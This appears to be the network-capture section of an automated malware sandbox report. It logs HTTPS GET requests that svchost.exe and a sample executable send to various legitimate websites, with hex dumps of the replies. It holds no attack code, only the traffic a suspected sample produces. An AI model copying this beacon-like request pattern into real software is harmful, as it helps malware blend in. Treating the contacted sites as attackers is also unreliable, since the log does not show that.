                                                                                                                                                                                                                                                                                        0192.168.2.351781185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC1INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:51 GMT
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC1INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        1192.168.2.35173735.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC2INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:51 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 75193
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                                        Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                        X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC18INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                                        Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC34INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC50INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                                        Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC66INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        10192.168.2.358456188.114.96.7443C:\Users\user\Desktop\fs7AQcREFX.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC78OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC80INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:51 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                        Expires: Wed, 31 May 2023 13:01:51 GMT
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nNDd8a3g4DU%2FcKcRT3KfGm%2BXEr%2BcMg8QRfASI6LpgJp7eR0ihsRRW32GDee6%2FL9h5uvxFzuSP2E6vn4VWQPmyG6SR5TRYNxZqoLwQEK35sNvdigazR3fT%2FUw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff59c79a48bbc7-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC81INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC81INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        11192.168.2.35844791.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC78OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC81INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:53:01 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC81INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC97INData Raw: 4e 41 52 49 55 4d 20 43 45 44 55 52 20 50 54 2e 20 e2 80 9e 43 59 42 45 52 42 45 5a 50 49 45 43 5a 45 c5 83 53 54 57 4f 20 57 2e 2e 2e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 33 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 74 61 2d 62 6f 74 74 6f 6d 20 68 69 64 65 22 3e 0d 0a 20 0d 0a 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 31 39 2e 30 31 2e 32 30 32 33
                                                                                                                                                                                                                                                                                        Data Ascii: NARIUM CEDUR PT. CYBERBEZPIECZESTWO W...</a> </h3> </div> <div class="meta-bottom hide"> 2000 <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 19.01.2023
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:51 UTC113INData Raw: 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 0d 0a 31 30 30 30 0d 0a 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 12618" alt="Guchoniemi" /></a></div><div class="item" style="width:300px; height:179px;margin-bottom:10px"><a href="/w20/batony/4596,1000Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=16571


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        12192.168.2.363360185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:58 UTC2700OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:58 UTC2700INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:58 GMT
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:58 UTC2701INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        13192.168.2.36345535.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2701OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2702INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:51:59 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 75193
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                                        Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                        X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2702INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                                        2023-05-31 12:51:59 UTC2718INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                                        Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
